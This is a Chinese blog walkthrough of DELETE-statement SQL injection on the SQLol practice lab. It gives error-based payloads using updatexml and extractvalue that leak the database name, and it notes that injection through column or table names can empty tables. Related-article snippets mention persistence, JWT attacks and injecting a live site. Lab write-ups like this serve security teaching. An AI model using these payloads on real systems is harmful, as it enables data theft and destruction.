SQL注入测试平台 SQLol -5.DELETE注入测试

最新推荐文章于 2023-05-19 21:12:05 发布
最新推荐文章于 2023-05-19 21:12:05 发布
阅读量479 收藏
点赞数
分类专栏: 【渗透测试】
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_23936389/article/details/81256101
版权

  访问首页的delete模块,http://127.0.0.1/sql/delete.php,开始对delete模块进行测试。

delete语法:

DELETE FROM 【users】 WHERE 【username】 = 【'1'】

  

几个位置都可能存在注入,这里只演示一种。

下面演示注入到不同位置的方法。

 

一、String in WHERE clause

构造POC:

' or updatexml(1,concat(0x7e,(database()),0x7e),0) or '

获取数据库


二、Integer in WHERE clause

构造POC:

'' or extractvalue(1,concat(0x7e,database())) or ''

获取数据库


三、Column Name

注入点在【1】处

DELETE FROM users WHERE 【1】 = 1 

利用方式:

1、清空users表

2、构造报错注入语句

 


四、Table Name

注入点在【1】处

DELETE FROM 1 WHERE isadmin = 0 

利用方式:

1、清空任意表

2、构造报错,爆出数据

 

Bypass--
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
26-1 SQL 注入攻击 - delete注入
weixin_43263566的博客
03-10 186
因为靶场的源码没有对这个传入的id做过滤,所以这个位置存在注入点,我们先将抓到的删除请求发送到重发器,然后在id后面加上反斜杠再次删除,就会出现sql的错误提示。在 SQL 注入攻击中,常常使用这种方式来构造恶意条件,以绕过原有的查询逻辑。如果后台没有对接收到的 id 参数进行充分的验证和过滤,恶意用户可能会利用这一点进行注入攻击。对于后台来说,delete操作通常是将对应的id传递到后台,然后后台会删除该id对应的数据。: 这是 SQL 中的注释符号,表示后面的内容都是注释,不会被执行。
最好用的内网穿透工具合集
08-31 2万+
在渗透过程中,我们需要快速实现内网穿透,从而绕过网络访问限制,直接从外网来访问内网。今天,我们来推荐几款非常好用的内网穿透工具,如有其它推荐,欢迎补充和指正。1、ngrokngrok 是...
sql注入渗透测试工具:sqlol/DVWA
04-24
sql注入渗透测试工具:sqlol/DVWA https://xianjie0318.blog.csdn.net/article/details/112987555?spm=1001.2014.3001.5502
SQL注入测试平台 SQLol -2.SELECT注入测试
Galaxy_0的博客
01-13 196
SQL注入测试平台 SQLol -2.SELECT注入测试
实战真实网站的SQL注入
qq_55376995的博客
12-24 5960
某建设投资集团股份有限公司网站存在SQL注入一、发现过程1.使用百度语法寻找可能存在SQL注入的网站:inurl:?id=12.发现一个网站进去看看3.尝试手工注入:?id=1106'?id=1106-1?id=1106-24.发现页面发生变化,可能存在SQL注入二、漏洞利用1.这里使用sqlmap进行注入检测表:​检测字段:检测数据:4.然后跑出用户名和密码,但密码是加密过的,我用MD5解密最后得出。
delete注入
Ethan024的博客
03-30 967
delete注入 实验环境: 皮卡丘平台delete注入 原理: if(array_key_exists(‘id’, $_GET)){ KaTeX parse error: Expected '}', got 'EOF' at end of input: …ge where id = {$_GET[‘id’]}"; …} 要在’id’出构造闭合 实验步骤: 可以看到此时有一条留言: 删除该留言并且用Burpsuite抓包,并发送到repeater中: 设计payload:1 or updatexml
SQL注入】UPDATE、insert、delete注入
07-08 3056
SQL注入
安全测试之使用Docker搭建SQL注入安全测试平台sqli-labs
最新发布
05-19 556
光学理论是没用的,要学会跟着一起敲,要动手实操,才能将自己的所学运用到实际当中去,这时候可以搞点实战案例来学习。如下,此后SQL注入测试学习可通过此网站测试
3-2SQL注入网站实例:注入点的发现与测试
山兔的博客
02-09 5631
我们得到目标网站的一般信息和技术分析信息之后,我们接下来,就开始寻找注入点和测试注入点 1.常用注入点在哪里? 1.常用注入点 我们一般在三个地方,寻找注入点 A.表单中的输入域 B.URL的参数 除非特别说明,否则其它的默认我们叫URL的参数中进行发挥 也是url中最重要,发挥的最好的一部分 C.Cookie或者隐藏域 因此对表单中的输入域、Cookie或者隐藏域,需要对网页的输入输出机制有充分的分析和了解 2.如何发现注入点? 我们先来看看这些注入点,有什么特点 1.表单中的输入域,Cookie或者隐藏
3-1SQL注入网站实例:注入步骤
小王的储物间
03-20 1630
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。同时每个成长路线对应的板块都有配套的视频提供:当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
sql注入扫描_sqlmap-1.1.3.zip
02-13
sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了。现在支持python3了
安全测试-常见sql注入方法,命令
03-31
安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入...
SQL注入-概述-ppt.pptx
10-27
SQL相关资料
SQL注入-防范-ppt.pptx
10-27
SQL相关资料
Window下常见的权限维持方式
热门推荐
12-02 4万+
在获取服务器权限后,通常会用一些后门技术来维持服务器权限,服务器一旦被植入后门,攻击者便如入无人之境。本文将对常见的window服务端自启动后门技术进行解析,知己知彼方能杜绝后门。 0x01 注册表自启动 通过修改注册表自启动键值,添加一个木马程序路径,实现开机自启动。 常用的注册表启动键: # Run键 HKEY_CURRENT_USER\Software\Microsoft\Win...
JWT攻击手册:如何入侵你的Token
12-11 3万+
JSON Web Token(JWT)对于渗透测试人员而言,可能是一个非常吸引人的攻击途径。因为它不仅可以让你伪造任意用户获得无限的访问权限,而且还可能进一步发现更多的安全漏洞,如信息泄露,越权访问,SQLi,XSS,SSRF,RCE,LFI等。 首先我们需要识别应用程序正在使用JWT,最简单的方法是在代理工具的历史记录中搜索JWT正则表达式: [=]ey[A-Za-z0-9_-]*\....
一份超级实用的勒索病毒自救指南
12-30 2万+
经常会有一些小伙伴问:中了勒索病毒,该怎么办,可以解密吗?第一次遇到勒索病毒是在早几年的时候,客户因网站访问异常,进而远程协助进行排查。登录服务器,在站点目录下发现所有的脚本文件及附件后...
常用Web安全扫描工具合集
04-25 1万+
初入门时,喜欢将目标站点直接丢扫描器,慢慢等扫描结果,极度依赖Web扫描器;而有一些漏洞高手,善于运用运用各种工具但并不依赖工具,经常可以找到扫描工具发现不了的漏洞。一款好用的Web扫描器...
mybatis-plus.global-config.db-config.logic-delete-value 是什么配置
04-14
这是一个 MyBatis-Plus 框架的全局配置,其中 db-config 表示数据库配置,logic-delete-value 表示逻辑删除的值。该配置通常用于在数据库中实现逻辑删除功能,指定逻辑删除的值,在 SQL 语句中进行相关操作。具体...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Bypass--

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值